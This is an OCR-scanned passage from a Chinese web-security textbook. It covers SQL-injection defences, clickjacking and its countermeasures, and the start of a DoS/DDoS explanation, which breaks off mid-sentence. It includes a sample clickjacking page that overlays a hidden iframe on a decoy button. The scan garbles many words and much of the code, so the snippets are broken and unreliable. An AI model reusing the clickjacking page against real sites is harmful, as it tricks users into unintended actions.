using System.Data.OracleClient; // 引 入 操作 包 

string strSoL= 6 "select user.name from user where user.name= :userName"; 

// 设 置 查询 语句 ,并 标明 user 表 中 的 name 字段 的 占 位 符 为 userName 

OracleParameter[] paramF 


{ 
new OracleParameter (":userNarme", txtName); 


} 
// 设 置 userkame 替换 的 内 容 是 txtName, 也 就 是 用 户 输入 的 参数 
OracleCamand and new OracleCamand (); 
cr.CommandText= strSoL; 
// 定 义 oracle 参数 的 内 容 
for (oracleParameter p in param) 
{ 
cam.Parameters.MGa(p)7 
了 // 传 人 参数 
cd.FxecuteNonOuery (); // 命 令 执 行 


在 以 上 例子 中 ,txtName 作为 用 户 输入 的 内 容 , 在 执行 参数 化 时 ,将 其 内 容 提交 给 其 
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占 位 符 username,username 就 是 txtName 的 占 位 符 。 这 时 ,数据 库 在 进行 数据 查询 时 就 
知道 了 ,凡是 由 占 位 符 username 提交 的 数据 ,都 是 用 户 在 登录 用 户 名 时 提交 的 数据 , 即 
使 其 中 含有 特殊 构造 的 SQL 语句 ,数据 库 也 会 将 其 区 分 为 普通 的 数据 而 不 是 SQL 命 
令 , 故 用 此 方法 可 以 预防 SQL 注入 。 

参数 化 语句 的 优点 是 将 用 户 提交 的 内 容 用 占 位 符 来 代替 ,这样 数据 库 在 执行 时 可 以 
有 效 地 区 分 用 户 提 交 的 数据 和 SQL 查询 语句 ,杜绝 了 SQL 注入 , 且 执 行 效率 高 .速度 快 。 
但 是 ,参数 化 SQL 在 编写 时 对 格式 要 求 严格 ,不 同 的 数据 库 有 不 同 的 参数 化 格式 (如 
Access 数据 库 中 参数 化 SQL 语句 时 直接 以 ?作为 参数 名 ,在 SQL Server 中 是 参数 有 @ 
前 级 ) ,并 不 像 SQL 语句 对 于 不 同 数据 库 有 普 适 性 , 且 参 数 化 SQL 的 高 效率 是 基于 系统 
预 编译 的 ,大 量 使 用 的 话 会 占用 较 多 系统 资源 。 

(2) 使 用 输入 限制 。 

使 用 输入 验证 , 旨 在 限制 用 户 提交 非法 数据 ,确保 其 提交 的 数据 符合 应 用 程序 的 标 
准 。 数 据 验证 ,可 以 简单 限制 数据 的 类 型 ,也 可 以 复杂 化 到 使 用 正则 表达 式 或 业务 逻辑 
来 验证 输入 。 在 进行 输入 限制 时 ,可 以 使 用 白 名 单 法 或 黑 名 单 法 ,两 种 验证 方式 是 思想 
截然 相反 的 方法 。 前 文 简单 介绍 到 , 白 名 单 让 用 户 只 能 输入 限定 的 合法 字符 ,而 黑 名 单 
让 用 户 不 能 输入 限定 的 非法 字符 。 其 验证 的 方法 主要 是 使 用 正则 表达 式 。 

正则 表达 式 是 一 种 可 以 用 于 模式 匹配 和 替换 的 强 有 力 的 工具 , 它 不 单 能 用 来 匹配 字 
符 串 的 文本 ,还 能 用 来 测试 字符 串 的 模式 。 例 如 ,可 以 对 特定 的 输入 字符 串 进 行 测试 ,看 
在 该 字符 串 中 是 否 存在 电话 号 码 或 信用 卡号 码 。 正 则 表达 式 可 以 用 来 测试 数据 的 有 
效 性 。 

但 使 用 正则 表达 式 ,依然 不 能 掩盖 使 用 输入 限制 这 种 方法 的 缺点 。 毕 况 , 正 则 表达 
式 的 内 容 是 由 黑 名 单 和 白 名 单 决 定 的 ,而 黑 名 单 和 白 名 单 的 内 容 是 人 工 制定 的 。 

如 果 单 单 使 用 白 名 单 ,必须 明确 知道 输入 的 内 容 和 业务 逻辑 。 例 如 ,在 提交 用 户 名 
时 只 能 输入 字母 或 汉字 等 ,而 不 能 出 现 特殊 符号 。 但 是 如 果 输 入 的 内 容 并 不 能 确定 字符 
集 与 业务 逻辑 时 , 白 名 单 的 方法 几乎 无 法 使 用 。 

黑 名 单 的 方法 也 类 似 ,用 户 输入 的 内 容 组 合 多 种 多 样 ,并 不 能 明确 定义 哪些 输入 的 
内 容 一 定 是 合法 或 非法 的 。 可 能 攻击 者 在 输入 内 容 中 加 入 了 一 些 不 常见 的 绕 过 方式 ,而 
这 些 方式 并 不 在 黑 名 单 的 定义 中 ,这 样 也 会 使 攻击 者 成 功 进行 SQL 注入 。 

(3) 存储 过 程 。 

存储 过 程 ,就 是 将 比较 复杂 的 查询 ,预先 用 SQL 语句 写 好 ,存在 一 个 指定 的 函数 中 ， 
以 后 在 需要 使 用 该 查询 时 只 要 用 execute 语句 调用 该 函数 即 可 。 存 储 过 程 只 有 在 创造 时 
才 会 被 编译 ,编译 一 次 以 后 都 不 需要 再 编译 ,可 以 有 效 提高 SQL 语句 执行 速度 , 且 存 储 
过 程 安全 性 比较 高 ,具有 一 定 权 限 的 用 户 才 可 以 使 用 存储 过 程 。 

但 这 并 不 意味 着 存储 过 程 没 有 缺点 。 在 传统 的 C/S 结构 中 ,普通 用 户 也 可 以 连接 数 
据 库 ,所 以 存储 过 程 可 以 单独 让 管理 人 员 拥 有 更 高 的 权限 去 操作 数据 、 保 护 数据 ;但 是 在 
B/S 的 三 层 架 构 中 ,普通 的 用 户 没有 连接 数据 库 的 权限 ,只 有 了 网络 管理 员 可 以 ,所 以 这 时 
候 存储 过 程 的 安全 机 制 有 点 多 余 。 而 且 , 在 存储 过 程 中 使 用 拼接 语句 的 话 , 还 是 会 导致 
SQL 注入 的 产生 。 普 通 的 查询 ,在 执行 时 传递 的 是 组 合 好 的 SQL 命令 字符 串 ,基于 存储 


#@: 网 络 安全 横 切 面 


155 


过 程 的 查询 ,在 传递 时 传递 的 是 存储 过 程 名 和 参数 ,虽然 两 者 的 传递 过 程 有 区 别 , 不 过 数 
据 到 了 存储 层 , 最 终 还 是 要 将 存储 过 程 名 和 参数 组 合成 一 段 SQL 代码 。 

2) 应 用 层 防护 一 一 Web 应 用 防火 墙 

本 质 上 ,Web 应 用 安全 问题 源 于 Web 软件 开发 的 质量 问题 。 但 Web 应 用 软件 与 非 
Web 应 用 软件 相 比 ,具有 其 独特 性 。 首 先 , Web 应 用 往往 是 为 某 些 特定 机 构 编 写 的 应 
用 ,对 其 存在 的 漏洞 ,已 知 的 通用 漏洞 签名 缺乏 有 效 性 ;其 次 , Web 应 用 需要 频繁 地 变更 
以 满足 业务 需要 ,从 而 使 应 用 的 开发 和 维护 变 得 很 复杂 ;最 后 , Web 开发 需要 全 面 理解 客 
户 端 与 服务 端的 复杂 交互 过 程 ,而 开发 Web 的 人 员 往 往 专业 性 不 足 导致 开发 中 出 现 
玖 漏 。 

理想 的 Web 应 用 安全 ,应 该 将 安全 编码 原则 贯穿 于 整个 Web 应 用 软件 的 生命 周期 
中 ,并 在 不 同 阶段 采取 不 同 的 安全 措施 。 然 而 ,多 数 网 站 的 实际 情况 是 : 以 前 开发 的 
Web 应 用 ,由 于 早期 技术 不 成 熟 , 都 存在 或 多 或 少 的 安全 问题 ,由 于 其 定制 化 特点 决定 了 
没有 通用 补丁 可 用 ,如 果 对 其 进行 整改 会 令 整 个 工程 量 庞大 而 变 得 无 法 实施 。 而 如 今 开 
发 的 Web 应 用 软件 虽然 有 统一 和 相似 的 技术 使 得 维护 变 得 简单 ,但 是 面 对 日 益 增长 的 
网 络 威胁 ,防护 技术 的 成 熟 速度 依然 落后 于 攻击 技术 的 成 熟 速度 。 

在 这 种 时 代 背 景 下 ,专业 的 Web 安全 防护 工具 变 成 了 大 众 理想 的 选择 。Web 应 用 
防火 墙 (Web Application Firewall, WAF), 正 是 这 类 专业 工具 的 代表 。 它 的 出 现 , 为 网 站 
防护 提供 了 一 种 安全 运 维 控制 手段 。 它 能 够 对 HTTP/HTTPS 流量 进行 双向 分 析 , 为 
Web 应 用 提供 专业 实时 有 效 的 防护 。 它 相 较 于 传统 的 防火 墙 . 入 侵 防 护 系 统 (IPS) 等 在 
Web 防护 领域 具有 明显 优势 ,能 够 真正 针对 应 用 层 的 防护 ,能 完整 地 解析 HTTP, 包 括 报 
文 头 .传递 参数 及 载荷 ;支持 各 种 HTTP 编码 ;提供 严格 的 HTTP 协议 验证 ;提供 
HTML 限制 ;支持 各 类 字符 集 编码 ;具备 response 过 滤 能 力 。 

(1) 反 向 代理 。 

WAF 为 了 防护 网 站 ,一 般 部 署 在 Web 服务 器 集群 前 端 ,采用 反 向 代理 的 模式 ,对 经 
过 WAF 的 HTTP 请 求 包 进行 双向 过 滤 。 反 向 代理 模式 是 WAF 相对 安全 的 一 大 原因 ， 
其 比较 于 正 向 代理 模式 ,在 网 站 防护 方面 具有 更 大 的 优势 。 正 向 代理 是 这 样 一 种 模式 ， 
处 于 互联 网 中 的 用 户 ,将 HTTP 请 求 包 发 送 给 代理 服务 器 ,由 代理 服务 器 经 过 数据 处 理 ， 
再 将 HTTP 请 求 包 转发 给 处 于 内 网 中 的 服务 器 ,服务 器 接收 请 求 ,执行 相关 操作 后 ,将 
HTTP 响应 结果 直接 回 发 给 处 于 外 网 的 用 户 。 这 时 如 果 采 用 wireshark 进行 抓 包 的 话 ， 
会 看 见 Web 服务 器 的 源 IP 地 址 ,从 而 暴露 目标 。 

WAF 的 反 向 代理 比较 于 正 向 代理 ,区 别 在 于 服务 器 回 发 HTTP 请 求 响应 时 ,会 将 
响应 包 先 提交 给 WAF, 而 不 是 提交 给 用 户 。 由 WAF 对 HTTP 包 POST 请 求 头 部 及 
cookie 进行 验证 后 ,将 HTTP 请 求 回 发 给 代理 服务 器 。 如 此 一 来 ,HTTP 响应 包 的 源 IP 
地 址 是 代理 服务 器 的 地 址 而 不 是 服务 器 真实 地 址 ,HTTP 请 求 对 用 户 不 透明 ,用 户 无 法 
通过 抓 包工 具 获 取 服 务 器 的 IP 地 址 ,使 网 站 相对 安全 。 

(2) HTTP 请 求 包 验证 模块 。 

WAF 在 作为 代理 服务 器 的 过 程 中 ,会 对 经 过 的 信息 进行 数据 包 验 证 。 验 证 的 信息 
包括 源 地 址 、 目 的 地 址 、 请 求 方 法 、 数 据 合 法 性 、cookie 信息 、 应 用 程序 种 类 等 。WAF 会 
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根据 Web 应 用 程序 签名 来 识别 Web 应 用 ,WAF 识别 QQ 数据 包 ,能 够 获取 用 户 发 送信 
息 .QQ 账号 等 信息 。 再 验证 提交 的 数据 段 中 内 容 是 否 含有 SQL 注入 等 攻击 ,来 决定 丢 
弃 还 是 转发 数据 包 。 

(3) SQL 防 注 和 人 模块。 

SQL 防 注入 模块 的 功能 ,就 是 将 经 过 WAEF 的 网 络 报 文 包 中 的 data 字段 经 解密 后 的 
内 容 , 与 用 户 和 安全 厂商 根据 网 站 业务 需求 自 定义 的 SQL 黑 名 单 进行 对 比 。 一 旦 发 现 
用 户 提 交 的 数据 ,与 黑 名 单 中 的 特征 值 匹配 ,就 将 用 户 提 交 的 数据 包 丢 弃 , 并 对 用 户 告 
警 。 分 为 以 下 4 个 步骤 ,首先 截获 数据 包 ; 其 次 对 特定 端口 的 包 分 析 ; 再 次 根据 获得 的 包 
目的 地 址 选择 相应 的 正则 规则 库 后 进行 规则 匹配 ;最 后 对 数据 包 进 行 处 理 。 


324 点 击 动 持 技术 


点 击 劫持 (CClickjacking) 技 术 又 称 为 界面 伪装 攻击 (UI redress attack) ,是 一 种 基于 
欺骗 的 Web 会 话 攻击 技术 ,其 主要 的 攻击 思想 是 利用 用 户 对 安全 技术 知识 缺乏 ,在 用 户 
不 知情 的 情况 下 点 击 恶 意 链 接 。OWASP 定义 是 攻击 者 利用 多 层 不 透明 或 者 透明 层 欺 
骗 用 户 。 当 用 户 点 击 顶 层 页 面 的 一 个 按钮 或 者 链接 时 ,被 动 持 到 其 他 页 面 的 恶意 按钮 或 
链接 。 通 常情 况 下 ,顶层 页 面 和 底层 页 面 是 不 同 的 Web 应 用 程序 ,有 不 同 的 域名 。 


1. 点 击 动 持 攻击 原理 


攻击 者 在 点 击 动 持 漏洞 利用 实现 过 程 中 使 用 iframe 作为 目标 网 页 载体 。iframe 是 
HTML 标准 中 的 一 个 标签 ,可 以 创建 包含 另外 一 个 页 面 的 内 联 框架 ,在 点 击 劫持 漏洞 利 
用 中 主要 用 来 载 人 目标 网 页 。 其 原理 如 图 3. 27 所 示 。 


a 


Ce 


图 3.27 点 击 劫持 攻击 原理 
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这 里 以 网 站 为 例 说 明 点 击 支持 漏洞 的 原理 。 攻 击 者 执行 的 步 又 : 

(1) 黑客 创建 一 个 网 页 ,利用 包含 目标 网 站 (BANK XYZ) 。 

(2) 黑客 隐藏 目标 网 站 ,使 得 浏览 器 中 用 户 无 法 察觉 到 目标 网 站 存在 。 

(3) 黑客 构造 网 页 ,诱骗 用 户 点 击 特定 按钮 (图 3. 27 中 的 链接 WWW. OWVSP. 
COM 下 方 的 按钮 ) 。 

(4) 受害 者 点 击 按钮 ,触发 执行 网 页 的 命令 ,将 钱 款 汇 到 XYZ 银行 的 名 为 
ABCDEFG 的 账户 中 。 

可 以 来 看 下 一 个 更 为 具体 的 例子 ,其 代码 如 下 : 


<! DOCTYPE html> 

<htm> 

< meta http- equiv= "Content- Type" content= "text/html; harset= utf- 8"> 
<head> 

<title> clickjacking< /title> 

<style> 


filter: alpha (opacity= 0); 

} 

button { 

position: absolute; 

top: 230px; 

left: 1200px; 

2Z- index: 1; 

width: 80px; 

height:20px; 

. 

</style> 

< /head> 

< body> 

<button> click to go! < /button> 
< jmg src= "http://abc.cava.jpg> 
< iframe src= "http://clickjacking.cam" scrolling= "no> < /iframe> 
< /body> 

< /htm> 


当 用 户 单 击 恶意 网 页 上 的 click to go 按钮 之 后 ,实际 上 用 户 在 不 知情 的 情况 下 对 目 
标 网 站 进行 了 操作 。 

通过 以 上 例子 ,可 以 看 到 攻击 者 想 要 成 功 实现 攻击 ,需要 考虑 很 多 的 因素 ,点击 动 持 
漏洞 利用 的 重要 因素 总 结 如 下 : 
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Mi:s 


(1) 目标 网 页 必须 能 够 以 一 定 方式 存在 恶意 网 页 之 上 ,例如 ,利用 iframe 技术 包含 
特定 的 页 面 。 

(2) 客户 浏览 器 能 够 实现 iframe 包含 网 页 的 自动 登录 功能 ,例如 ,用 户 设置 自动 登 
录 或 者 用 户 正 在 登录 此 网 站 ,保证 攻击 者 能 够 利用 用 户 身份 进行 恶意 攻击 。 

(3) 由 于 攻击 者 欺骗 用 户 点 击 执行 特定 目标 ,不 涉及 代码 执行 过 程 ,因此 点 击 劫持 漏 
洞 利用 和 浏览 器 是 否 禁用 JavaScript 脚本 没有 必然 关系 。 

(4) 点 击 支持 漏洞 利用 的 难点 在 于 如 何 设计 交互 式 恶意 网 站 欺骗 用 户 。 黑 客 必须 保 
证 用 户 执行 点 击 、 拖 中 等 命令 ,才能 触发 完成 一 次 攻击 过 程 。 


2. 点 击 支持 攻击 特点 


通过 分 析 可 以 看 出 ,点 击 劫持 漏洞 及 利用 技术 有 其 自身 的 特点 。 明 确 了 其 优 缺 点 ,有 
利于 攻击 者 掌握 点 击 劫持 漏洞 利用 的 技术 。 从 攻击 者 的 角度 分 析 点 击 劫持 漏洞 的 优 缺 点 。 

1) 点 击 劫持 漏洞 的 利用 优势 

从 攻击 者 的 角度 分 析 , 相 比较 传统 的 Web 攻击 方法 ,点 击 劫持 漏洞 的 利用 优势 主要 
在 于 以 下 几 个 方面 : 

(1) 利用 条 件 低 。 

多 数 情况 下 不 需要 浏览 器 支持 JavaScript 脚本 ,如 果 支 持 JavaScript 更 加 方便 攻击 
者 利用 点 击 劫持 漏洞 ;同时 ,由 于 攻击 代码 在 客户 端 运行 ,使 得 网 站 难以 防御 。 

(2) 利用 场景 多 。 

可 以 利用 其 他 插件 漏洞 进行 攻击 ,例如 ,利用 Flash 漏洞 进行 攻击 ;大 多 数 情况 下 可 
以 绕 过 CSRF 漏洞 的 现 有 防御 机 制 ,例如 ,nonces。 

(3) 攻击 成 功率 高 。 

通过 界面 伪装 技术 ,直接 引导 用 户 点 击 ,增加 了 恶意 按钮 的 点 击 概率 。 

(4) 网 站 玖 于 防御 。 

由 于 点 击 支持 漏洞 属于 较 新 的 攻击 方式 ,大 部 分 网 站 对 于 此 类 漏洞 都 玖 于 防御 。 

2) 点 击 劫持 漏洞 的 利用 难点 

在 实际 攻击 场景 中 ,有 很 多 的 因素 都 影响 攻击 的 成 功率 。 从 攻击 者 的 角度 分 析 ,点 
击 劫持 漏洞 的 利用 难点 有 以 下 两 个 方面 : 

(1) 代码 复 用 率 低 。 

由 于 浏览 器 的 兼容 性 问题 ,攻击 代码 的 复 用 率 不 高 。 另 一 方面 , 当 网 页 布局 发 生变 
化 ,基于 界面 攻击 的 代码 无 法 重 现 。 

(2) 利用 方法 复杂 。 

攻击 者 需要 精心 设计 程序 界面 ,设计 用 户 交互 过 程 , 才 能 成 功 欺骗 用 户 ,完成 特定 的 
攻击 。 

3) 点 击 劫持 漏洞 的 主要 危害 

当 攻 击 者 成 功 劫持 用 户 的 浏览 器 之 后 ,就 可 以 劫持 用 户 的 操作 ,获取 用 户 的 权限 。 
通常 来 说 ,点 击 劫持 漏洞 的 主要 危害 分 为 以 下 几 类 

(1) 发 送 垃 圾 信息 。 例 如 ,利用 微 博 等 社交 网 络 自动 发 送 垃 圾 信息 。 
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(2) 信息 泄露 。 例 如 ,电话 视频 会 议 内 容 泄露 ,在线 存储 文件 泄露 ,邮件 信息 泄露 。 

(3) 恶意 操作 。 例 如 ,自动 登录 远程 桌面 发 送 敏感 信息 ,自动 购买 垃圾 商品 ,手机 自 
动 拨 叫 其 他 用 户 。 

(4) 设置 网 络 设备 。 例 如 ,恶意 设置 网 络 设备 的 参数 ,修改 伪造 用 户 密码 ,设置 网 络 
防火 墙 突破 安全 机 制 。 


3. 点 击 劫持 攻击 防护 


1) 点 击 劫持 漏洞 检测 

关于 自动 化 检测 点 击 劫持 漏洞 ,常用 的 有 来 自 content security 公司 的 Paul Stone 设 
计 开 发 的 Clickjacking Tool 检测 工具 和 Marco Balduzzi 等 人 完成 的 “自动 化 检测 点 击 动 
持 漏洞 工具 ”, 目 前 没有 商业 工具 支持 点 击 支持 漏洞 检测 ,因此 我 们 着 重 介 绍 这 两 款 
工具 。 

在 2010 年 Blackhat 大 会 上 Paul Stone 发 布 了 点 击 支持 工具 。 该 工具 帮助 安全 测试 
人 员 在 没有 脚本 语言 和 浏览 器 安全 知识 的 基础 上 能 够 快速 掌握 点 击 劫持 漏洞 的 原理 、 攻 
击 和 防御 方法 。 该 工具 已 经 实现 半自动 化 点 击 劫持 漏洞 检测 以 及 原理 分 析 。 安 全 测试 
人 员 使 用 Clickjacking Tool 可 以 进行 点 击 测试 、 拖 忠 、 文 本 注入 等 点 击 支持 利用 技术 测 
试 ,还 可 以 模拟 攻击 者 的 攻击 行为 。 

Marco Balduzzi 等 人 设计 的 自动 化 检测 点 击 劫持 攻击 工具 ,结合 ClickIDS 和 
NoScript 两 个 插件 的 优点 ,设计 出 完全 自动 化 的 漏洞 检测 工具 ,设计 目标 如 下 : 

(1) 一 体 化 的 解决 方案 。 将 检测 模块 和 测试 模块 连接 成 为 一 体 。 

(2) 自动 化 检测 。 浏 览 器 脚本 模拟 用 户 的 真实 点 击 行为 ,并 利用 点 击 劫持 漏洞 的 特 
点 ,分 析 匹 配 页 面 元 素 的 动态 变化 , 找 出 页 面 漏洞 。 

(3) 动态 检测 页 面 元 素 的 变化 。 自 动 测试 多 个 有 连接 顺序 的 请 求 页 面 ,减少 漏洞 检 
测 的 漏 报 率 。 

(4) 双重 检测 。 使 用 两 个 独立 的 基于 Mozilla 浏览 器 插件 (ClickIDS 和 改进 的 
NoScript) 分 析 点 击 行为 ,并 加 以 比较 总 结 。 

该 工具 能 起 到 一 定 作 用 ,但 目前 该 工具 还 不 是 很 完善 , 误 报 率 较 高 ,需要 继续 改进 。 

2) 点 击 劫持 漏洞 防御 

点 击 劫持 漏洞 防御 措施 可 以 从 两 个 方面 考虑 , 即 服务 器 端 防 御 和 客户 端 防 御 。 服 务 
器 端 防御 主要 涉及 用 户 身 份 验证 ,客户 端 防御 主要 涉及 浏览 器 的 安全 。 

服务 器 端 防御 点 击 劫持 漏洞 的 思想 是 结合 浏览 器 的 安全 机 制 进 行 防御 。 主 要 的 防 
御 方 法 介绍 如 下 。 

(1) X-FRAME-OPTIONS 机 制 。 

在 2009 年 微软 发 布 新 一 代 的 浏览 器 IE8. 0 中 首次 提出 全 新 的 安全 机 制 : 
X-FRAME-OPTIONS。 该 机 制 实 际 上 是 微软 提出 的 一 个 http 头 ,专门 用 来 防御 利用 
iframe 内 套 的 点 击 劫持 攻击 。 这 个 头 有 三 个 值 ,DENY 表示 任何 网 页 都 不 能 使 用 载 人 该 
网 页 ;SAMEORIGIN 表示 符合 同 源 策略 的 网 页 可 以 使 用 载 和 人 该 网 页 ;ALLOW-FROM 
表示 可 以 定义 允许 frame 加 载 的 页 面 地 址 。 浏 览 器 载 和 信使 用 此 安全 机 制 的 网 站 时 发 现 
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可 疑 行为 ,会 提示 用 户 正 在 浏览 有 的 网 页 存在 安全 隐患 ,并 建议 用 户 在 新 窗口 中 打开 。 这 
样 攻击 者 就 无 法 通过 iframe 隐藏 目 标的 网 页 。 

(2) 使 用 FrameBusting 代码 。 

点 击 劫持 攻击 需要 首先 将 目标 网 站 载 和 人 到 恶意 网 站 中 ,使 用 iframe 载 人 网 页 是 最 有 
效 的 方法 。Web 安全 研究 人 员 针 对 iframe 特性 提出 FrameBusting 代码 ,使 用 JavaScript 
脚本 阻止 恶意 网 站 载 人 网 页 。 如 果 检 测 到 网 页 被 非法 网 页 载 人 ,就 执行 自动 跳 转 功能 。 
目前 FrameBusting 代码 是 一 种 有 效 防御 网 站 被 攻击 者 恶意 载 人 的 方法 ,网 站 开发 人 员 
使 用 FrameBusting 代码 阻止 页 面 被 非法 载 人 。 基 于 斯 坦 福 大 学 安全 小 组 的 研究 成 果 ， 
使 用 推荐 的 FrameBusting 代码 可 以 保证 网 站 大 部 分 用 户 的 安全 性 。 需 要 指出 的 情况 
是 ,如 果 用 户 浏览 器 禁用 JavaScript 脚本 ,那么 FrameBusting 代码 也 无 法 正常 运行 。 所 
以 ,该 类 代码 只 能 提供 部 分 保障 功能 。 

目前 较 好 的 FrameBusting 代码 例子 如 下 : 


<head> 

< style> body { display : none;} < /style> 

< /head> 

<body> 

< script> 

if (self==top) { 
Var theBody= docment .getElement'sByTagName ("body"') [0]; 
theBody.style.display= "block"; 

} else { 
top.locatior= self.location; 


} 

< /script> 

但 是 FrameBusting 也 存在 一 些 缺 陷 。 由 于 它 是 用 JavaScript 写 的 ,控制 能 力 并 不 是 
特别 强 , 因 此 有 许多 方法 可 以 绕 过 它 。HTML 5 中 iframe 的 sandbox 属性 IE 中 iframe 
的 security 属性 等 ,都 可 以 限制 iframe 页 面 中 的 JavaScript 脚本 执行 ,从 而 可 以 使 得 
FrameBusting 失效 。 

(3) 使 用 认证 码 认 证 用 户 。 

既然 点 击 劫持 漏洞 通过 伪造 网 站 界面 进行 攻击 ,那么 网 站 开发 人 员 可 以 通过 认证 码 
识别 用 户 ,确定 是 用 户 发 出 的 点 击 命令 才 执行 相应 操作 。 识 别 用 户 的 方法 中 最 有 效 的 方 
法 是 认证 码 认 证 。 例 如 ,在 网 站 上 广泛 存在 的 发 帖 认 证 码 , 要 求 用 户 输入 图 形 中 的 字符 ， 
输入 某 些 图 形 的 特征 等 。 该 方法 的 缺点 也 很 明显 , 即 用 户 感觉 太 复 杂 , 这 样 糟糕 的 用 户 
界面 设计 会 让 大 部 分 用 户 望而却步 。 因 此 ,如 何 进 行 折 中 设计 ,实现 安全 性 和 易 用 性 的 
统一 ,是 安全 人 员 的 下 一 步 努 力 方向 。 

由 于 点 击 支持 攻击 的 代码 在 客户 端 执行 ,因此 客户 端 有 很 多 机 制 防 御 此 漏洞 。 除 了 
用 于 服务 器 端 设计 的 安全 防御 机 制 外 ,以 下 介绍 针对 客户 端 安全 的 防御 方法 。 

@ 升级 浏览 器 。 

最 新 版 本 的 浏览 器 提供 很 多 防御 点 击 劫持 漏洞 的 安全 机 制 ,例如 ,所 有 浏览 器 的 最 
新 版 本 都 支持 X-FRAME-OPTIONS 特性 。 因 此 ,对 于 普通 的 互联 网 用 户 , 经 常 更 新 浏 
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览 器 ,修复 浏览 器 的 安全 漏洞 ,能够 最 有 效 地 防止 恶意 攻击 。 

@ NoScript 扩展 。 

对 于 Firefox 的 用 户 ,使 用 NoScript 扩展 能 够 在 一 定 程 度 上 检测 和 阻止 点 击 劫持 攻 
击 。NoScript 是 Firefox 浏览 器 中 的 一 个 插件 ,该 插件 的 主要 功能 是 屏蔽 网 页 中 的 恶意 
脚本 ,防止 脚本 病毒 和 XSS 代码 攻击 。 同 时 ,利用 NoScript 中 ClearClick 组 件 能 够 检测 
和 警告 潜在 的 点 击 支持 攻击 ,自动 检测 页 面 中 可 能 不 安全 的 页 面 。 但 是 该 工具 的 误 报 率 
比较 高 ,需要 用 户 自行 判断 。 


325 分 布 式 拒绝 服务 DDoS 攻击 


1. DDoS 攻击 原理 


DDoS 攻击 是 由 DoS 攻击 发 展 而 来 的 ,根据 攻击 原理 和 方式 的 区 别 , 可 以 把 DDoS 攻 
击 分 为 两 个 阶段 , 即 从 传统 的 基于 网 络 层 的 DDoS 攻击 到 现 阶段 的 应 用 层 DDoS 攻击 。 
这 两 类 攻击 方式 各 有 特点 ,都 对 网 络 的 安全 造成 了 极 大 的 危害 。 对 于 应 用 层 DDoS 攻击 
来 说 ,基于 服务 器 的 攻击 是 最 常见 的 ,因此 ,在 Web 领域 广泛 应 用 的 HTTP 协议 的 重要 
性 显而易见 了 。 但 在 了 解 DDoS 攻击 之 前 ,我 们 需要 大 致 了 解 一 下 DoS 攻击 。 

1) DoS 攻击 

DoS 攻击 是 拒绝 服务 攻击 的 简称 , 即 Denial of Service。 从 原理 上 来 说 ,DoS 攻击 可 
以 分 为 以 下 的 两 种 类 型 ; 

(1) 系统 漏洞 型 。 

这 种 类 型 的 DoS 攻击 是 利用 操作 系统 或 者 应 用 程序 本 身 所 具有 的 漏洞 来 发 起 的 , 攻 
击 者 通过 构造 出 针对 攻击 目标 的 漏洞 报 文 来 对 攻击 目标 发 起 攻击 ,攻击 者 利用 这 种 攻击 
方式 以 达到 拒绝 服务 攻击 的 目的 。 

(2) 资源 耗 尽 型 。 

资源 耗 尽 型 DoS 攻击 主要 目标 是 消耗 掉 系统 的 带宽 或 者 例如 CPU 资源 等 ,攻击 者 
发 送 大 量 的 非法 的 请 求 数据 包 , 使 攻击 目标 出 现 资源 或 者 带宽 上 的 迅速 消耗 ,从 而 无 法 
响应 其 他 正常 的 用 户 的 请 求 。 

DoS 攻击 有 许多 攻击 方式 ,可 以 参考 本 书 之 前 罗列 的 DoS 攻击 方式 。 其 中 最 常见 的 
攻击 就 是 利用 合理 的 请 求 来 消耗 攻击 目标 主机 的 资源 ,由 于 攻击 目标 主机 资源 的 快速 消 
耗 , 使 得 合法 的 用 户 无 法 得 到 所 请 求 的 服务 。 对 于 拒绝 服务 攻击 来 说 ,单一 的 DoS 攻击 
是 最 原始 的 攻击 方式 ,这 一 般 是 采用 一 对 一 方式 , 当 攻 击 目 标 主机 由 于 自身 的 低 处 理 速 
度 . 较 小 的 内 存 容量 或 者 较 小 的 网 络 带宽 等 原因 ,就 会 使 得 单一 的 DoS 攻击 效果 变 得 较 
为 明显 。 然 而 随 着 计算 机 的 处 理 能 力 和 内 存 性 能 的 提高 ,并 且 伴 随 着 网 络 带宽 的 增长 ， 
使 得 单一 的 DoS 攻击 的 效果 变 得 不 明显 ,假设 攻击 者 在 一 段 时 间 区 间 内 可 以 发 送 个 攻击 
数据 包 ,而 攻击 目标 主机 在 相同 的 时 间 区 间 内 可 以 处 理 MGM>N) 个 数据 包 , 这 样 一 来 攻 
击 就 不 会 产生 什么 效果 。 为 了 使 得 攻击 效果 可 以 超过 攻击 目标 的 “消化 能 力 ”, 就 出 现 了 
DDoS 攻击 方式 。 

2) DDoS 攻击 
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DDoS 攻击 是 建立 在 DoS 攻击 的 基础 之 上 的 ,是 为 了 解决 由 于 服务 器 带宽 和 资源 增 
加 所 造成 的 DoS 攻击 效果 下 降 的 问题 。 如 果 网 络 处 理性 能 增长 了 N 倍 , 那 么 只 要 能 够 
同时 使 得 MCM 宇 N) 台 攻击 主机 同时 发 动 攻击 ,就 可 以 很 快 耗 尽 服务 器 的 资源 ,达到 拒绝 
服务 的 目的 。 

DDoS 攻击 是 攻击 者 控制 了 一 台 倪 介 机 ,攻击 者 将 其 作为 控制 其 他 攻击 倪 偶 机 以 及 
发 布 攻击 命令 用 ,进一步 的 攻击 者 将 利用 成 百 上 千 台 被 植 人 守护 进程 的 侧 癸 主机 作为 真 
正 的 攻击 源 , 同 时 对 服务 器 发 起 请 求 。 另 外 一 个 值得 关注 的 问题 则 在 于 ,因为 现今 的 网 
络 通常 分 布 较为 广泛 ,因此 ,攻击 者 可 以 通过 控制 多 重 的 倪 偶 机 来 有 效 地 掩藏 自己 的 真 
实 位 置 , 这 在 追查 攻击 者 的 时 候 势 必 将 涉及 更 大 的 网 络 范围 ,更 多 的 机 构 和 部 门 , 也 将 耗 
费 大 量 的 人 力 、 物 力 和 财力 。 这 就 造成 了 很 难 追 查 到 攻击 者 的 确切 位 置 ,而 这 正 是 DDoS 
攻击 越 来 越 普 遍 的 原因 之 一 。 在 攻击 当中 ,网 络 结构 包括 有 攻击 者 、 主 控 机 、 倪 偶 机 等 三 
部 分 。 攻 击 者 ,真正 发 动 攻击 的 人 ,攻击 者 隐藏 在 攻击 网 络 后 面 , 利 用 主 控 机 给 数量 众多 
的 倪 偶 机 对 攻击 对 象 实施 攻击 。 而 攻击 者 往往 会 选择 不 只 一 两 层 的 网 络 结 构 ,攻击 者 会 
把 自己 隐藏 的 较 深 ,这 样 就 使 得 追查 攻击 者 的 确切 位 置 变 得 困难 。 主 控 机 , 主 控 机 是 受 
